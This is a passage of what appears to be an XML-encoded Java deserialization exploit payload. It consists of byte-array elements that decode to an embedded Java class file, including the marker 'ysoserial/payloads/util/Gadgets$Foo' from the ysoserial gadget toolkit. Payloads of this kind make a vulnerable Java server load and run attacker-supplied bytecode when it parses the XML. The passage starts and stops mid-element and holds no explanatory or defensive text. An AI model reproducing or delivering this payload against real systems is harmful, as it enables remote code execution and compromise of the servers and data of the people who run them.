index=\"3614\"><byte>25</byte></void><void index=\"3615\"><byte>0</byte></void><void index=\"3616\"><byte>0</byte></void><void index=\"3617\"><byte>0</byte></void><void index=\"3618\"><byte>4</byte></void><void index=\"3619\"><byte>0</byte></void><void index=\"3620\"><byte>1</byte></void><void index=\"3621\"><byte>0</byte></void><void index=\"3622\"><byte>26</byte></void><void index=\"3623\"><byte>0</byte></void><void index=\"3624\"><byte>1</byte></void><void index=\"3625\"><byte>0</byte></void><void index=\"3626\"><byte>19</byte></void><void index=\"3627\"><byte>0</byte></void><void index=\"3628\"><byte>27</byte></void><void index=\"3629\"><byte>0</byte></void><void index=\"3630\"><byte>2</byte></void><void index=\"3631\"><byte>0</byte></void><void index=\"3632\"><byte>12</byte></void><void index=\"3633\"><byte>0</byte></void><void index=\"3634\"><byte>0</byte></void><void index=\"3635\"><byte>0</byte></void><void index=\"3636\"><byte>73</byte></void><void index=\"3637\"><byte>0</byte></void><void index=\"3638\"><byte>0</byte></void><void index=\"3639\"><byte>0</byte></void><void index=\"3640\"><byte>4</byte></void><void index=\"3641\"><byte>0</byte></void><void index=\"3642\"><byte>0</byte></void><void index=\"3643\"><byte>0</byte></void><void index=\"3644\"><byte>1</byte></void><void index=\"3645\"><byte>-79</byte></void><void index=\"3646\"><byte>0</byte></void><void index=\"3647\"><byte>0</byte></void><void index=\"3648\"><byte>0</byte></void><void index=\"3649\"><byte>2</byte></void><void index=\"3650\"><byte>0</byte></void><void index=\"3651\"><byte>13</byte></void><void index=\"3652\"><byte>0</byte></void><void index=\"3653\"><byte>0</byte></void><void index=\"3654\"><byte>0</byte></void><void index=\"3655\"><byte>6</byte></void><void index=\"3656\"><byte>0</byte></void><void index=\"3657\"><byte>1</byte></void><void index=\"3658\"><byte>0</byte></void><void index=\"3659\"><byte>0</byte></void><void index=\"3660\"><byte>0</byte></void><void index=\"3661\"><byte>56</byte></void><void index=\"3662\"><byte>0</byte></void><void index=\"3663\"><byte>14</byte></void><void index=\"3664\"><byte>0</byte></void><void index=\"3665\"><byte>0</byte></void><void index=\"3666\"><byte>0</byte></void><void index=\"3667\"><byte>42</byte></void><void index=\"3668\"><byte>0</byte></void><void index=\"3669\"><byte>4</byte></void><void index=\"3670\"><byte>0</byte></void><void index=\"3671\"><byte>0</byte></void><void index=\"3672\"><byte>0</byte></void><void index=\"3673\"><byte>1</byte></void><void index=\"3674\"><byte>0</byte></void><void index=\"3675\"><byte>15</byte></void><void index=\"3676\"><byte>0</byte></void><void index=\"3677\"><byte>-71</byte></void><void index=\"3678\"><byte>0</byte></void><void index=\"3679\"><byte>0</byte></void><void index=\"3680\"><byte>0</byte></void><void index=\"3681\"><byte>0</byte></void><void index=\"3682\"><byte>0</byte></void><void index=\"3683\"><byte>1</byte></void><void index=\"3684\"><byte>0</byte></void><void index=\"3685\"><byte>21</byte></void><void index=\"3686\"><byte>0</byte></void><void index=\"3687\"><byte>22</byte></void><void index=\"3688\"><byte>0</byte></void><void index=\"3689\"><byte>1</byte></void><void index=\"3690\"><byte>0</byte></void><void index=\"3691\"><byte>0</byte></void><void index=\"3692\"><byte>0</byte></void><void index=\"3693\"><byte>1</byte></void><void index=\"3694\"><byte>0</byte></void><void index=\"3695\"><byte>28</byte></void><void index=\"3696\"><byte>0</byte></void><void index=\"3697\"><byte>29</byte></void><void index=\"3698\"><byte>0</byte></void><void index=\"3699\"><byte>2</byte></void><void index=\"3700\"><byte>0</byte></void><void index=\"3701\"><byte>0</byte></void><void index=\"3702\"><byte>0</byte></void><void index=\"3703\"><byte>1</byte></void><void index=\"3704\"><byte>0</byte></void><void index=\"3705\"><byte>30</byte></void><void index=\"3706\"><byte>0</byte></void><void index=\"3707\"><byte>31</byte></void><void index=\"3708\"><byte>0</byte></void><void index=\"3709\"><byte>3</byte></void><void index=\"3710\"><byte>0</byte></void><void index=\"3711\"><byte>25</byte></void><void index=\"3712\"><byte>0</byte></void><void index=\"3713\"><byte>0</byte></void><void index=\"3714\"><byte>0</byte></void><void index=\"3715\"><byte>4</byte></void><void index=\"3716\"><byte>0</byte></void><void index=\"3717\"><byte>1</byte></void><void index=\"3718\"><byte>0</byte></void><void index=\"3719\"><byte>26</byte></void><void index=\"3720\"><byte>0</byte></void><void index=\"3721\"><byte>8</byte></void><void index=\"3722\"><byte>0</byte></void><void index=\"3723\"><byte>41</byte></void><void index=\"3724\"><byte>0</byte></void><void index=\"3725\"><byte>11</byte></void><void index=\"3726\"><byte>0</byte></void><void index=\"3727\"><byte>1</byte></void><void index=\"3728\"><byte>0</byte></void><void index=\"3729\"><byte>12</byte></void><void index=\"3730\"><byte>0</byte></void><void index=\"3731\"><byte>0</byte></void><void index=\"3732\"><byte>1</byte></void><void index=\"3733\"><byte>114</byte></void><void index=\"3734\"><byte>0</byte></void><void index=\"3735\"><byte>7</byte></void><void index=\"3736\"><byte>0</byte></void><void index=\"3737\"><byte>11</byte></void><void index=\"3738\"><byte>0</byte></void><void index=\"3739\"><byte>0</byte></void><void index=\"3740\"><byte>1</byte></void><void index=\"3741\"><byte>18</byte></void><void index=\"3742\"><byte>-89</byte></void><void index=\"3743\"><byte>0</byte></void><void index=\"3744\"><byte>3</byte></void><void index=\"3745\"><byte>1</byte></void><void index=\"3746\"><byte>76</byte></void><void index=\"3747\"><byte>-72</byte></void><void index=\"3748\"><byte>0</byte></void><void index=\"3749\"><byte>47</byte></void><void index=\"3750\"><byte>-64</byte></void><void index=\"3751\"><byte>0</byte></void><void index=\"3752\"><byte>49</byte></void><void index=\"3753\"><byte>-74</byte></void><void index=\"3754\"><byte>0</byte></void><void index=\"3755\"><byte>53</byte></void><void index=\"3756\"><byte>-64</byte></void><void index=\"3757\"><byte>0</byte></void><void index=\"3758\"><byte>55</byte></void><void index=\"3759\"><byte>18</byte></void><void index=\"3760\"><byte>57</byte></void><void index=\"3761\"><byte>-74</byte></void><void index=\"3762\"><byte>0</byte></void><void index=\"3763\"><byte>61</byte></void><void index=\"3764\"><byte>77</byte></void><void index=\"3765\"><byte>-72</byte></void><void index=\"3766\"><byte>0</byte></void><void index=\"3767\"><byte>47</byte></void><void index=\"3768\"><byte>-64</byte></void><void index=\"3769\"><byte>0</byte></void><void index=\"3770\"><byte>49</byte></void><void index=\"3771\"><byte>-74</byte></void><void index=\"3772\"><byte>0</byte></void><void index=\"3773\"><byte>53</byte></void><void index=\"3774\"><byte>-64</byte></void><void index=\"3775\"><byte>0</byte></void><void index=\"3776\"><byte>55</byte></void><void index=\"3777\"><byte>-74</byte></void><void index=\"3778\"><byte>0</byte></void><void index=\"3779\"><byte>65</byte></void><void index=\"3780\"><byte>78</byte></void><void index=\"3781\"><byte>45</byte></void><void index=\"3782\"><byte>18</byte></void><void index=\"3783\"><byte>67</byte></void><void index=\"3784\"><byte>-74</byte></void><void index=\"3785\"><byte>0</byte></void><void index=\"3786\"><byte>73</byte></void><void index=\"3787\"><byte>45</byte></void><void index=\"3788\"><byte>-74</byte></void><void index=\"3789\"><byte>0</byte></void><void index=\"3790\"><byte>77</byte></void><void index=\"3791\"><byte>58</byte></void><void index=\"3792\"><byte>4</byte></void><void index=\"3793\"><byte>25</byte></void><void index=\"3794\"><byte>4</byte></void><void index=\"3795\"><byte>-69</byte></void><void index=\"3796\"><byte>0</byte></void><void index=\"3797\"><byte>79</byte></void><void index=\"3798\"><byte>89</byte></void><void index=\"3799\"><byte>-69</byte></void><void index=\"3800\"><byte>0</byte></void><void index=\"3801\"><byte>81</byte></void><void index=\"3802\"><byte>89</byte></void><void index=\"3803\"><byte>-73</byte></void><void index=\"3804\"><byte>0</byte></void><void index=\"3805\"><byte>82</byte></void><void index=\"3806\"><byte>44</byte></void><void index=\"3807\"><byte>-74</byte></void><void index=\"3808\"><byte>0</byte></void><void index=\"3809\"><byte>86</byte></void><void index=\"3810\"><byte>18</byte></void><void index=\"3811\"><byte>88</byte></void><void index=\"3812\"><byte>-74</byte></void><void index=\"3813\"><byte>0</byte></void><void index=\"3814\"><byte>86</byte></void><void index=\"3815\"><byte>-74</byte></void><void index=\"3816\"><byte>0</byte></void><void index=\"3817\"><byte>92</byte></void><void index=\"3818\"><byte>-73</byte></void><void index=\"3819\"><byte>0</byte></void><void index=\"3820\"><byte>94</byte></void><void index=\"3821\"><byte>-74</byte></void><void index=\"3822\"><byte>0</byte></void><void index=\"3823\"><byte>100</byte></void><void index=\"3824\"><byte>25</byte></void><void index=\"3825\"><byte>4</byte></void><void index=\"3826\"><byte>-74</byte></void><void index=\"3827\"><byte>0</byte></void><void index=\"3828\"><byte>103</byte></void><void index=\"3829\"><byte>18</byte></void><void index=\"3830\"><byte>105</byte></void><void index=\"3831\"><byte>-72</byte></void><void index=\"3832\"><byte>0</byte></void><void index=\"3833\"><byte>110</byte></void><void index=\"3834\"><byte>58</byte></void><void index=\"3835\"><byte>5</byte></void><void index=\"3836\"><byte>25</byte></void><void index=\"3837\"><byte>5</byte></void><void index=\"3838\"><byte>1</byte></void><void index=\"3839\"><byte>-91</byte></void><void index=\"3840\"><byte>0</byte></void><void index=\"3841\"><byte>16</byte></void><void index=\"3842\"><byte>25</byte></void><void index=\"3843\"><byte>5</byte></void><void index=\"3844\"><byte>-74</byte></void><void index=\"3845\"><byte>0</byte></void><void index=\"3846\"><byte>115</byte></void><void index=\"3847\"><byte>18</byte></void><void index=\"3848\"><byte>117</byte></void><void index=\"3849\"><byte>-74</byte></void><void index=\"3850\"><byte>0</byte></void><void index=\"3851\"><byte>121</byte></void><void index=\"3852\"><byte>-102</byte></void><void index=\"3853\"><byte>0</byte></void><void index=\"3854\"><byte>6</byte></void><void index=\"3855\"><byte>-89</byte></void><void index=\"3856\"><byte>0</byte></void><void index=\"3857\"><byte>33</byte></void><void index=\"3858\"><byte>-72</byte></void><void index=\"3859\"><byte>0</byte></void><void index=\"3860\"><byte>127</byte></void><void index=\"3861\"><byte>-69</byte></void><void index=\"3862\"><byte>0</byte></void><void index=\"3863\"><byte>81</byte></void><void index=\"3864\"><byte>89</byte></void><void index=\"3865\"><byte>-73</byte></void><void index=\"3866\"><byte>0</byte></void><void index=\"3867\"><byte>82</byte></void><void index=\"3868\"><byte>18</byte></void><void index=\"3869\"><byte>-127</byte></void><void index=\"3870\"><byte>-74</byte></void><void index=\"3871\"><byte>0</byte></void><void index=\"3872\"><byte>86</byte></void><void index=\"3873\"><byte>44</byte></void><void index=\"3874\"><byte>-74</byte></void><void index=\"3875\"><byte>0</byte></void><void index=\"3876\"><byte>86</byte></void><void index=\"3877\"><byte>-74</byte></void><void index=\"3878\"><byte>0</byte></void><void index=\"3879\"><byte>92</byte></void><void index=\"3880\"><byte>-74</byte></void><void index=\"3881\"><byte>0</byte></void><void index=\"3882\"><byte>-123</byte></void><void index=\"3883\"><byte>58</byte></void><void index=\"3884\"><byte>6</byte></void><void index=\"3885\"><byte>-89</byte></void><void index=\"3886\"><byte>0</byte></void><void index=\"3887\"><byte>30</byte></void><void index=\"3888\"><byte>-72</byte></void><void index=\"3889\"><byte>0</byte></void><void index=\"3890\"><byte>127</byte></void><void index=\"3891\"><byte>-69</byte></void><void index=\"3892\"><byte>0</byte></void><void index=\"3893\"><byte>81</byte></void><void index=\"3894\"><byte>89</byte></void><void index=\"3895\"><byte>-73</byte></void><void index=\"3896\"><byte>0</byte></void><void index=\"3897\"><byte>82</byte></void><void index=\"3898\"><byte>18</byte></void><void index=\"3899\"><byte>-121</byte></void><void index=\"3900\"><byte>-74</byte></void><void index=\"3901\"><byte>0</byte></void><void index=\"3902\"><byte>86</byte></void><void index=\"3903\"><byte>44</byte></void><void index=\"3904\"><byte>-74</byte></void><void index=\"3905\"><byte>0</byte></void><void index=\"3906\"><byte>86</byte></void><void index=\"3907\"><byte>-74</byte></void><void index=\"3908\"><byte>0</byte></void><void index=\"3909\"><byte>92</byte></void><void index=\"3910\"><byte>-74</byte></void><void index=\"3911\"><byte>0</byte></void><void index=\"3912\"><byte>-123</byte></void><void index=\"3913\"><byte>58</byte></void><void index=\"3914\"><byte>6</byte></void><void index=\"3915\"><byte>-69</byte></void><void index=\"3916\"><byte>0</byte></void><void index=\"3917\"><byte>-119</byte></void><void index=\"3918\"><byte>89</byte></void><void index=\"3919\"><byte>-69</byte></void><void index=\"3920\"><byte>0</byte></void><void index=\"3921\"><byte>-117</byte></void><void index=\"3922\"><byte>89</byte></void><void index=\"3923\"><byte>25</byte></void><void index=\"3924\"><byte>6</byte></void><void index=\"3925\"><byte>-74</byte></void><void index=\"3926\"><byte>0</byte></void><void index=\"3927\"><byte>-111</byte></void><void index=\"3928\"><byte>18</byte></void><void index=\"3929\"><byte>67</byte></void><void index=\"3930\"><byte>-73</byte></void><void index=\"3931\"><byte>0</byte></void><void index=\"3932\"><byte>-108</byte></void><void index=\"3933\"><byte>-73</byte></void><void index=\"3934\"><byte>0</byte></void><void index=\"3935\"><byte>-105</byte></void><void index=\"3936\"><byte>58</byte></void><void index=\"3937\"><byte>7</byte></void><void index=\"3938\"><byte>1</byte></void><void index=\"3939\"><byte>58</byte></void><void index=\"3940\"><byte>8</byte></void><void index=\"3941\"><byte>18</byte></void><void index=\"3942\"><byte>-103</byte></void><void index=\"3943\"><byte>58</byte></void><void index=\"3944\"><byte>9</byte></void><void index=\"3945\"><byte>-89</byte></void><void index=\"3946\"><byte>0</byte></void><void index=\"3947\"><byte>25</byte></void><void index=\"3948\"><byte>-69</byte></void><void index=\"3949\"><byte>0</byte></void><void index=\"3950\"><byte>81</byte></void><void index=\"3951\"><byte>89</byte></void><void index=\"3952\"><byte>-73</byte></void><void index=\"3953\"><byte>0</byte></void><void index=\"3954\"><byte>82</byte></void><void index=\"3955\"><byte>25</byte></void><void index=\"3956\"><byte>9</byte></void><void index=\"3957\"><byte>-74</byte></void><void index=\"3958\"><byte>0</byte></void><void index=\"3959\"><byte>86</byte></void><void index=\"3960\"><byte>25</byte></void><void index=\"3961\"><byte>8</byte></void><void index=\"3962\"><byte>-74</byte></void><void index=\"3963\"><byte>0</byte></void><void index=\"3964\"><byte>86</byte></void><void index=\"3965\"><byte>-74</byte></void><void index=\"3966\"><byte>0</byte></void><void index=\"3967\"><byte>92</byte></void><void index=\"3968\"><byte>58</byte></void><void index=\"3969\"><byte>9</byte></void><void index=\"3970\"><byte>25</byte></void><void index=\"3971\"><byte>7</byte></void><void index=\"3972\"><byte>-74</byte></void><void index=\"3973\"><byte>0</byte></void><void index=\"3974\"><byte>-100</byte></void><void index=\"3975\"><byte>89</byte></void><void index=\"3976\"><byte>58</byte></void><void index=\"3977\"><byte>8</byte></void><void index=\"3978\"><byte>1</byte></void><void index=\"3979\"><byte>-90</byte></void><void index=\"3980\"><byte>-1</byte></void><void index=\"3981\"><byte>-31</byte></void><void index=\"3982\"><byte>45</byte></void><void index=\"3983\"><byte>-74</byte></void><void index=\"3984\"><byte>0</byte></void><void index=\"3985\"><byte>-96</byte></void><void index=\"3986\"><byte>25</byte></void><void index=\"3987\"><byte>9</byte></void><void index=\"3988\"><byte>-74</byte></void><void index=\"3989\"><byte>0</byte></void><void index=\"3990\"><byte>-91</byte></void><void index=\"3991\"><byte>-89</byte></void><void index=\"3992\"><byte>0</byte></void><void index=\"3993\"><byte>24</byte></void><void index=\"3994\"><byte>58</byte></void><void index=\"3995\"><byte>10</byte></void><void index=\"3996\"><byte>-78</byte></void><void index=\"3997\"><byte>0</byte></void><void index=\"3998\"><byte>-85</byte></void><void index=\"3999\"><byte>25</byte></void><void index=\"4000\"><byte>10</byte></void><void index=\"4001\"><byte>-74</byte></void><void index=\"4002\"><byte>0</byte></void><void index=\"4003\"><byte>-82</byte></void><void index=\"4004\"><byte>-74</byte></void><void index=\"4005\"><byte>0</byte></void><void index=\"4006\"><byte>-77</byte></void><void index=\"4007\"><byte>25</byte></void><void index=\"4008\"><byte>10</byte></void><void index=\"4009\"><byte>-74</byte></void><void index=\"4010\"><byte>0</byte></void><void index=\"4011\"><byte>-74</byte></void><void index=\"4012\"><byte>-89</byte></void><void index=\"4013\"><byte>0</byte></void><void index=\"4014\"><byte>3</byte></void><void index=\"4015\"><byte>-79</byte></void><void index=\"4016\"><byte>0</byte></void><void index=\"4017\"><byte>1</byte></void><void index=\"4018\"><byte>0</byte></void><void index=\"4019\"><byte>94</byte></void><void index=\"4020\"><byte>0</byte></void><void index=\"4021\"><byte>-7</byte></void><void index=\"4022\"><byte>0</byte></void><void index=\"4023\"><byte>-4</byte></void><void index=\"4024\"><byte>0</byte></void><void index=\"4025\"><byte>-89</byte></void><void index=\"4026\"><byte>0</byte></void><void index=\"4027\"><byte>1</byte></void><void index=\"4028\"><byte>0</byte></void><void index=\"4029\"><byte>-73</byte></void><void index=\"4030\"><byte>0</byte></void><void index=\"4031\"><byte>0</byte></void><void index=\"4032\"><byte>0</byte></void><void index=\"4033\"><byte>70</byte></void><void index=\"4034\"><byte>0</byte></void><void index=\"4035\"><byte>9</byte></void><void index=\"4036\"><byte>3</byte></void><void index=\"4037\"><byte>-1</byte></void><void index=\"4038\"><byte>0</byte></void><void index=\"4039\"><byte>109</byte></void><void index=\"4040\"><byte>0</byte></void><void index=\"4041\"><byte>6</byte></void><void index=\"4042\"><byte>0</byte></void><void index=\"4043\"><byte>5</byte></void><void index=\"4044\"><byte>7</byte></void><void index=\"4045\"><byte>0</byte></void><void index=\"4046\"><byte>112</byte></void><void index=\"4047\"><byte>7</byte></void><void index=\"4048\"><byte>0</byte></void><void index=\"4049\"><byte>69</byte></void><void index=\"4050\"><byte>7</byte></void><void index=\"4051\"><byte>0</byte></void><void index=\"4052\"><byte>96</byte></void><void index=\"4053\"><byte>7</byte></void><void index=\"4054\"><byte>0</byte></void><void index=\"4055\"><byte>112</byte></void><void index=\"4056\"><byte>0</byte></void><void index=\"4057\"><byte>0</byte></void><void index=\"4058\"><byte>2</byte></void><void index=\"4059\"><byte>29</byte></void><void index=\"4060\"><byte>-4</byte></void><void index=\"4061\"><byte>0</byte></void><void index=\"4062\"><byte>26</byte></void><void index=\"4063\"><byte>7</byte></void><void index=\"4064\"><byte>0</byte></void><void index=\"4065\"><byte>-115</byte></void><void index=\"4066\"><byte>-2</byte></void><void index=\"4067\"><byte>0</byte></void><void index=\"4068\"><byte>32</byte></void><void index=\"4069\"><byte>7</byte></void><void index=\"4070\"><byte>0</byte></void><void index=\"4071\"><byte>-119</byte></void><void index=\"4072\"><byte>7</byte></void><void index=\"4073\"><byte>0</byte></void><void index=\"4074\"><byte>112</byte></void><void index=\"4075\"><byte>7</byte></void><void index=\"4076\"><byte>0</byte></void><void index=\"4077\"><byte>112</byte></void><void index=\"4078\"><byte>21</byte></void><void index=\"4079\"><byte>-1</byte></void><void index=\"4080\"><byte>0</byte></void><void index=\"4081\"><byte>23</byte></void><void index=\"4082\"><byte>0</byte></void><void index=\"4083\"><byte>6</byte></void><void index=\"4084\"><byte>0</byte></void><void index=\"4085\"><byte>5</byte></void><void index=\"4086\"><byte>7</byte></void><void index=\"4087\"><byte>0</byte></void><void index=\"4088\"><byte>112</byte></void><void index=\"4089\"><byte>7</byte></void><void index=\"4090\"><byte>0</byte></void><void index=\"4091\"><byte>69</byte></void><void index=\"4092\"><byte>7</byte></void><void index=\"4093\"><byte>0</byte></void><void index=\"4094\"><byte>96</byte></void><void index=\"4095\"><byte>7</byte></void><void index=\"4096\"><byte>0</byte></void><void index=\"4097\"><byte>112</byte></void><void index=\"4098\"><byte>0</byte></void><void index=\"4099\"><byte>1</byte></void><void index=\"4100\"><byte>7</byte></void><void index=\"4101\"><byte>0</byte></void><void index=\"4102\"><byte>-89</byte></void><void index=\"4103\"><byte>20</byte></void><void index=\"4104\"><byte>0</byte></void><void index=\"4105\"><byte>2</byte></void><void index=\"4106\"><byte>0</byte></void><void index=\"4107\"><byte>32</byte></void><void index=\"4108\"><byte>0</byte></void><void index=\"4109\"><byte>0</byte></void><void index=\"4110\"><byte>0</byte></void><void index=\"4111\"><byte>2</byte></void><void index=\"4112\"><byte>0</byte></void><void index=\"4113\"><byte>33</byte></void><void index=\"4114\"><byte>0</byte></void><void index=\"4115\"><byte>17</byte></void><void index=\"4116\"><byte>0</byte></void><void index=\"4117\"><byte>0</byte></void><void index=\"4118\"><byte>0</byte></void><void index=\"4119\"><byte>10</byte></void><void index=\"4120\"><byte>0</byte></void><void index=\"4121\"><byte>1</byte></void><void index=\"4122\"><byte>0</byte></void><void index=\"4123\"><byte>2</byte></void><void index=\"4124\"><byte>0</byte></void><void index=\"4125\"><byte>35</byte></void><void index=\"4126\"><byte>0</byte></void><void index=\"4127\"><byte>16</byte></void><void index=\"4128\"><byte>0</byte></void><void index=\"4129\"><byte>9</byte></void><void index=\"4130\"><byte>117</byte></void><void index=\"4131\"><byte>113</byte></void><void index=\"4132\"><byte>0</byte></void><void index=\"4133\"><byte>126</byte></void><void index=\"4134\"><byte>0</byte></void><void index=\"4135\"><byte>13</byte></void><void index=\"4136\"><byte>0</byte></void><void index=\"4137\"><byte>0</byte></void><void index=\"4138\"><byte>1</byte></void><void index=\"4139\"><byte>-44</byte></void><void index=\"4140\"><byte>-54</byte></void><void index=\"4141\"><byte>-2</byte></void><void index=\"4142\"><byte>-70</byte></void><void index=\"4143\"><byte>-66</byte></void><void index=\"4144\"><byte>0</byte></void><void index=\"4145\"><byte>0</byte></void><void index=\"4146\"><byte>0</byte></void><void index=\"4147\"><byte>50</byte></void><void index=\"4148\"><byte>0</byte></void><void index=\"4149\"><byte>27</byte></void><void index=\"4150\"><byte>10</byte></void><void index=\"4151\"><byte>0</byte></void><void index=\"4152\"><byte>3</byte></void><void index=\"4153\"><byte>0</byte></void><void index=\"4154\"><byte>21</byte></void><void index=\"4155\"><byte>7</byte></void><void index=\"4156\"><byte>0</byte></void><void index=\"4157\"><byte>23</byte></void><void index=\"4158\"><byte>7</byte></void><void index=\"4159\"><byte>0</byte></void><void index=\"4160\"><byte>24</byte></void><void index=\"4161\"><byte>7</byte></void><void index=\"4162\"><byte>0</byte></void><void index=\"4163\"><byte>25</byte></void><void index=\"4164\"><byte>1</byte></void><void index=\"4165\"><byte>0</byte></void><void index=\"4166\"><byte>16</byte></void><void index=\"4167\"><byte>115</byte></void><void index=\"4168\"><byte>101</byte></void><void index=\"4169\"><byte>114</byte></void><void index=\"4170\"><byte>105</byte></void><void index=\"4171\"><byte>97</byte></void><void index=\"4172\"><byte>108</byte></void><void index=\"4173\"><byte>86</byte></void><void index=\"4174\"><byte>101</byte></void><void index=\"4175\"><byte>114</byte></void><void index=\"4176\"><byte>115</byte></void><void index=\"4177\"><byte>105</byte></void><void index=\"4178\"><byte>111</byte></void><void index=\"4179\"><byte>110</byte></void><void index=\"4180\"><byte>85</byte></void><void index=\"4181\"><byte>73</byte></void><void index=\"4182\"><byte>68</byte></void><void index=\"4183\"><byte>1</byte></void><void index=\"4184\"><byte>0</byte></void><void index=\"4185\"><byte>1</byte></void><void index=\"4186\"><byte>74</byte></void><void index=\"4187\"><byte>1</byte></void><void index=\"4188\"><byte>0</byte></void><void index=\"4189\"><byte>13</byte></void><void index=\"4190\"><byte>67</byte></void><void index=\"4191\"><byte>111</byte></void><void index=\"4192\"><byte>110</byte></void><void index=\"4193\"><byte>115</byte></void><void index=\"4194\"><byte>116</byte></void><void index=\"4195\"><byte>97</byte></void><void index=\"4196\"><byte>110</byte></void><void index=\"4197\"><byte>116</byte></void><void index=\"4198\"><byte>86</byte></void><void index=\"4199\"><byte>97</byte></void><void index=\"4200\"><byte>108</byte></void><void index=\"4201\"><byte>117</byte></void><void index=\"4202\"><byte>101</byte></void><void index=\"4203\"><byte>5</byte></void><void index=\"4204\"><byte>113</byte></void><void index=\"4205\"><byte>-26</byte></void><void index=\"4206\"><byte>105</byte></void><void index=\"4207\"><byte>-18</byte></void><void index=\"4208\"><byte>60</byte></void><void index=\"4209\"><byte>109</byte></void><void index=\"4210\"><byte>71</byte></void><void index=\"4211\"><byte>24</byte></void><void index=\"4212\"><byte>1</byte></void><void index=\"4213\"><byte>0</byte></void><void index=\"4214\"><byte>6</byte></void><void index=\"4215\"><byte>60</byte></void><void index=\"4216\"><byte>105</byte></void><void index=\"4217\"><byte>110</byte></void><void index=\"4218\"><byte>105</byte></void><void index=\"4219\"><byte>116</byte></void><void index=\"4220\"><byte>62</byte></void><void index=\"4221\"><byte>1</byte></void><void index=\"4222\"><byte>0</byte></void><void index=\"4223\"><byte>3</byte></void><void index=\"4224\"><byte>40</byte></void><void index=\"4225\"><byte>41</byte></void><void index=\"4226\"><byte>86</byte></void><void index=\"4227\"><byte>1</byte></void><void index=\"4228\"><byte>0</byte></void><void index=\"4229\"><byte>4</byte></void><void index=\"4230\"><byte>67</byte></void><void index=\"4231\"><byte>111</byte></void><void index=\"4232\"><byte>100</byte></void><void index=\"4233\"><byte>101</byte></void><void index=\"4234\"><byte>1</byte></void><void index=\"4235\"><byte>0</byte></void><void index=\"4236\"><byte>15</byte></void><void index=\"4237\"><byte>76</byte></void><void index=\"4238\"><byte>105</byte></void><void index=\"4239\"><byte>110</byte></void><void index=\"4240\"><byte>101</byte></void><void index=\"4241\"><byte>78</byte></void><void index=\"4242\"><byte>117</byte></void><void index=\"4243\"><byte>109</byte></void><void index=\"4244\"><byte>98</byte></void><void index=\"4245\"><byte>101</byte></void><void index=\"4246\"><byte>114</byte></void><void index=\"4247\"><byte>84</byte></void><void index=\"4248\"><byte>97</byte></void><void index=\"4249\"><byte>98</byte></void><void index=\"4250\"><byte>108</byte></void><void index=\"4251\"><byte>101</byte></void><void index=\"4252\"><byte>1</byte></void><void index=\"4253\"><byte>0</byte></void><void index=\"4254\"><byte>18</byte></void><void index=\"4255\"><byte>76</byte></void><void index=\"4256\"><byte>111</byte></void><void index=\"4257\"><byte>99</byte></void><void index=\"4258\"><byte>97</byte></void><void index=\"4259\"><byte>108</byte></void><void index=\"4260\"><byte>86</byte></void><void index=\"4261\"><byte>97</byte></void><void index=\"4262\"><byte>114</byte></void><void index=\"4263\"><byte>105</byte></void><void index=\"4264\"><byte>97</byte></void><void index=\"4265\"><byte>98</byte></void><void index=\"4266\"><byte>108</byte></void><void index=\"4267\"><byte>101</byte></void><void index=\"4268\"><byte>84</byte></void><void index=\"4269\"><byte>97</byte></void><void index=\"4270\"><byte>98</byte></void><void index=\"4271\"><byte>108</byte></void><void index=\"4272\"><byte>101</byte></void><void index=\"4273\"><byte>1</byte></void><void index=\"4274\"><byte>0</byte></void><void index=\"4275\"><byte>4</byte></void><void index=\"4276\"><byte>116</byte></void><void index=\"4277\"><byte>104</byte></void><void index=\"4278\"><byte>105</byte></void><void index=\"4279\"><byte>115</byte></void><void index=\"4280\"><byte>1</byte></void><void index=\"4281\"><byte>0</byte></void><void index=\"4282\"><byte>3</byte></void><void index=\"4283\"><byte>70</byte></void><void index=\"4284\"><byte>111</byte></void><void index=\"4285\"><byte>111</byte></void><void index=\"4286\"><byte>1</byte></void><void index=\"4287\"><byte>0</byte></void><void index=\"4288\"><byte>12</byte></void><void index=\"4289\"><byte>73</byte></void><void index=\"4290\"><byte>110</byte></void><void index=\"4291\"><byte>110</byte></void><void index=\"4292\"><byte>101</byte></void><void index=\"4293\"><byte>114</byte></void><void index=\"4294\"><byte>67</byte></void><void index=\"4295\"><byte>108</byte></void><void index=\"4296\"><byte>97</byte></void><void index=\"4297\"><byte>115</byte></void><void index=\"4298\"><byte>115</byte></void><void index=\"4299\"><byte>101</byte></void><void index=\"4300\"><byte>115</byte></void><void index=\"4301\"><byte>1</byte></void><void index=\"4302\"><byte>0</byte></void><void index=\"4303\"><byte>37</byte></void><void index=\"4304\"><byte>76</byte></void><void index=\"4305\"><byte>121</byte></void><void index=\"4306\"><byte>115</byte></void><void index=\"4307\"><byte>111</byte></void><void index=\"4308\"><byte>115</byte></void><void index=\"4309\"><byte>101</byte></void><void index=\"4310\"><byte>114</byte></void><void index=\"4311\"><byte>105</byte></void><void index=\"4312\"><byte>97</byte></void><void index=\"4313\"><byte>108</byte></void><void index=\"4314\"><byte>47</byte></void><void index=\"4315\"><byte>112</byte></void><void index=\"4316\"><byte>97</byte></void><void index=\"4317\"><byte>121</byte></void><void index=\"4318\"><byte>108</byte></void><void index=\"4319\"><byte>111</byte></void><void index=\"4320\"><byte>97</byte></void><void index=\"4321\"><byte>100</byte></void><void index=\"4322\"><byte>115</byte></void><void index=\"4323\"><byte>47</byte></void><void index=\"4324\"><byte>117</byte></void><void index=\"4325\"><byte>116</byte></void><void index=\"4326\"><byte>105</byte></void><void index=\"4327\"><byte>108</byte></void><void index=\"4328\"><byte>47</byte></void><void index=\"4329\"><byte>71</byte></void><void index=\"4330\"><byte>97</byte></void><void index=\"4331\"><byte>100</byte></void><void index=\"4332\"><byte>103</byte></void><void index=\"4333\"><byte>101</byte></void><void index=\"4334\"><byte>116</byte></void><void index=\"4335\"><byte>115</byte></void><void index=\"4336\"><byte>36</byte></void><void index=\"4337\"><byte>70</byte></void><void index=\"4338\"><byte>111</byte></void><void index=\"4339\"><byte>111</byte></void><void index=\"4340\"><byte>59</byte></void><void index=\"4341\"><byte>1</byte></void><void index=\"4342\"><byte>0</byte></void><void index=\"4343\"><byte>10</byte></void><void index=\"4344\"><byte>83</byte></void><void index=\"4345\"><byte>111</byte></void><void index=\"4346\"><byte>117</byte></void><void index=\"4347\"><byte>114</byte></void><void index=\"4348\"><byte>99</byte></void><void index=\"4349\"><byte>101</byte></void><void index=\"4350\"><byte>70</byte></void><void index=\"4351\"><byte>105</byte></void><void index=\"4352\"><byte>108</byte></void><void index=\"4353\"><byte>101</byte></void><void index=\"4354\"><byte>1</byte></void><void index=\"4355\"><byte>0</byte></void><void index=\"4356\"><byte>12</byte></void><void index=\"4357\"><byte>71</byte></void><void 